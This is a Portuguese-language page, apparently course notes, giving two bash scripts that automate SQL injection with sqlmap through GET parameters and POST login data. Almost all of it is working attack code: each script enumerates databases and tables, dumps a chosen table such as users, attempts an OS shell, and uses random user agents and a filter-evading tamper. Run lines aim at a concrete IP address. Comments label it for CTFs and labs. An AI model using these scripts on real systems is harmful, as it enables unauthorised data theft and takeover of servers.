SQL Injection | Script automatizados | Solyd One
- SQL Injection | Script automatizados | Solyd One
Script para SQL INJECTION na URL | (NÃO FOI TESTADO)
#!/bin/bash
# Auto SQLMap para SQL Injection via GET (CTF / LAB)
if [ -z "$1" ]; then
echo "Uso: $0 <URL vulnerável>"
echo "Exemplo:"
echo " $0 http://alvo.com/cat.php?id=1"
exit 1
fi
TARGET="$1"
echo "[*] Testando SQL Injection na URL..."
sqlmap -u "$TARGET" \
--batch \
--random-agent \
--level=5 \
--risk=3 \
--banner
echo "[*] Enumerando bancos de dados..."
sqlmap -u "$TARGET" \
--batch \
--random-agent \
--level=5 \
--risk=3 \
--dbs
echo "[*] Digite o nome do banco (copie da saída acima):"
read -p ">> Banco: " DBNAME
echo "[*] Listando tabelas do banco '$DBNAME'..."
sqlmap -u "$TARGET" \
-D "$DBNAME" \
--tables \
--batch \
--random-agent \
--level=5 \
--risk=3
echo "[*] Digite o nome da tabela interessante (ex: users):"
read -p ">> Tabela: " TABLE
echo "[*] Fazendo dump da tabela '$TABLE'..."
sqlmap -u "$TARGET" \
-D "$DBNAME" \
-T "$TABLE" \
--dump \
--batch \
--random-agent \
--level=5 \
--risk=3
echo "[*] Tentando acesso ao sistema (os-shell), se suportado..."
sqlmap -u "$TARGET" \
--os-shell \
--batch \
--random-agent \
--level=5 \
--risk=3
chmod +x auto_sqlmap_get.sh
./auto_sqlmap_get.sh http://44.211.245.190/cat.php?id=1
Script para SQL INJECTION por POST DATA | (NÃO FOI TESTADO)
#!/bin/bash
# Auto SQLMap - Script básico para automatizar ataques SQLi em CTFs
if [ -z "$1" ]; then
echo "Uso: $0 <URL alvo>"
echo "Exemplo: $0 http://alvo.com/login.php"
exit 1
fi
TARGET="$1"
POST_DATA="user=teste&password=teste"
echo "[*] Testando SQLi básica com sqlmap..."
sqlmap -u "$TARGET" \
--data="$POST_DATA" \
--batch --random-agent --level=5 --risk=3 \
--tamper=space2comment \
--banner
echo "[*] Coletando bancos de dados..."
sqlmap -u "$TARGET" \
--data="$POST_DATA" \
--batch --random-agent --level=5 --risk=3 \
--tamper=space2comment \
--dbs
echo "[*] Você pode agora testar dump de tabelas. Insira o nome do banco (copie da saída acima):"
read -p ">> Nome do banco: " DBNAME
echo "[*] Listando tabelas no banco '$DBNAME'..."
sqlmap -u "$TARGET" \
--data="$POST_DATA" \
-D "$DBNAME" --tables \
--batch --random-agent --level=5 --risk=3 \
--tamper=space2comment
echo "[*] Digite o nome da tabela com dados importantes (ex: users):"
read -p ">> Nome da tabela: " TABELA
echo "[*] Fazendo dump da tabela '$TABELA'..."
sqlmap -u "$TARGET" \
--data="$POST_DATA" \
-D "$DBNAME" -T "$TABELA" --dump \
--batch --random-agent --level=5 --risk=3 \
--tamper=space2comment
echo "[*] Tentando obter shell no sistema (se possível)..."
sqlmap -u "$TARGET" \
--data="$POST_DATA" \
--os-shell \
--batch --random-agent --level=5 --risk=3 \
--tamper=space2comment
chmod +x auto_sqlmap.sh
./auto_sqlmap.sh http://44.211.245.190/admin/login.php